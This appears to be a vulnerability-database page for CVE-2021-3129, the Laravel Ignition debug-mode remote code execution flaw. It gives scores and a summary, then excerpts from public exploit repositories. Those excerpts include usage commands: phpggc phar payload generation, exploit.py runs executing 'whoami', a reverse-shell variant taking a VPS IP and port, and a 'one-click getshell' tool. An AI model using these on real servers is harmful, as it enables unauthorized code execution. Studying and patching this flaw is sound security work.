CVE-2021-3129

Published: 12/01/2021 Updated: 06/04/2021
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Ignition prior to 2.5.2, as used in Laravel and other products, allows unauthenticated remote malicious users to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel prior to 8.4.2.

Most Upvoted Vulmon Research Post

laravel debug mode rce | CVE-2021-3129 PoC Exploit is here: https://www.exploit-db.com/exploits/49424

Vulnerable Product

facade ignition

Mailing Lists

Ignition versions prior to 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel versions prior to 8.4.2 ...

Github Repositories

CVE-2021-3129 Laravel <= v8.4.2 debug mode: Remote code execution (CVE-2021-3129). Modified from @crisprss's github.com/crisprss/Laravel_CVE-2021-3129_EXP, adding more usable gadgets to iterate over. Use: python3 exp.py 1204812163:8888 Result: zhzy@debian:/opt/tools/vuln/laravel/CVE-2021-3129/phpggc$ python3 exp.py 127.0.0.1:8888 [*] Try t

Laravel debug rce

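CVE-2021-3129 Laravel debug rce. Usage: run docker-compose up -d to start the environment, then visit port 8888 and click "generate key" on the home page to reproduce it. A few notes on the docker environment: .env.example is copied to .env, which enables the debug environment; phar.readonly in php.ini is turned off; a hello template that references an undefined variable was added under resources/view/, and in routes/web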

CVE-2021-3129

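CVE-2021-3129 CVE-2021-3129-Laravel Debug mode remote code execution vulnerability. Affected versions and conditions: Laravel <= 8.4.2, Ignition < 2.5.2. Environment setup: docker pull vulhub/laravel:8.4.2. Using the exp: download and run in the same directory as exploit.py: git clone github.com/ambionics/phpggc.git python3 exploit.py 127.0.0.1:80 "whoami"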

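CVE-2021-3129. Affected scope: Laravel <= 8.4.2, Ignition < 2.5.2. Environment: note that it must be run from the phpggc directory, and a php-cli environment is required. Usage: python3 exp.py url vps_ip vps_port. Then just receive the shell directly on the VPS.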

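evil_ftp. This script works best together with CVE-2021-3129 laravel debug rce. Run the script above and a malicious FTP service comes up (the comments are already quite detailed). What the script does is simple: the first time the client connects, it returns our preset payload; the second time the client connects, it redirects the client's connection to 127.0.0.1:9000, that is, our php-fpm service's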

Exploit for CVE-2021-3129

laravel-exploits Exploit for CVE-2021-3129 Details: www.ambionics.io/blog/laravel-debug-rce Usage $ php -d'phar.readonly=0' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system id $ ./laravel-ignition-rce.py localhost:8000/ /tmp/exploit.phar Log file: /work/pentest/laravel/laravel/storage/logs/laravel.log Logs cleared Successfu

laravel-CVE-2021-3129-EXP. CVE-2021-3129 one-click getshell. Usage: python3 laravel-CVE-2021-3129-EXP.py 127.0.0.1:8000. After it succeeds, just connect with Godzilla.

Exploit for CVE-2021-3129

CVE-2021-3129-exploit Exploit for CVE-2021-3129 Lab setup: $ git clone github.com/laravel/laravel.git $ cd laravel $ git checkout e849812 $ composer install $ composer require facade/ignition==2.5.1 $ php artisan serve Usage: $ git clone github.com/nth347/exploit-CVE-2021-3129.git $ cd exploit-CVE-2021-3129 $ chmod +x exploit.py $ ./exploit.py localhost:

Laravel_CVE-2021-3129_EXP

Laravel-8.4.2-rce-CVE-2021-3129 exploit.py: tested with python3, and only works with phpggc

CVE-2021-3129_exploit Exploit for CVE-2021-3129 Lab setup: $ git clone github.com/laravel/laravel.git $ cd laravel $ git checkout e849812 $ composer install $ composer require facade/ignition==2.5.1 $ php artisan serve Usage: $ git clone github.com/nth347/CVE-2021-3129_exploit.git $ cd CVE-2021-3129_exploit $ chmod +x exploit.py $ ./exploit.py localhost:

This project will, from time to time, publish some of the latest vulnerabilities from the Edge (棱角) community.

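Vulnerability. In memory of what we have always loved; all who come are friends, and those who leave are not held back. © Edge Security Team. Anchor CMS 0.12.7 cross-site request forgery (CVE-2020-23342); Apache Kylin API unauthorized access vulnerability (CVE-2020-13937); Apache NiFi Api remote code execution (RCE); Bypass for Microsoft Exchange remote code execution CVE-2020-16875; CISCO ASA arbitrary file read vulnerability (CVE-2020-3452); CNVD-20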

PoC in GitHub 2021. CVE-2021-1056 (2021-01-07): NVIDIA GPU Display Driver for Linux, all versions, contains a vulnerability in the kernel mode layer (nvidia.ko) in which it does not completely honor operating system file system permissions to provide GPU device-level isolation, which may lead to denial of service or information disclosure. pokerfaceSad/CVE-2021-1056 CVE-2021-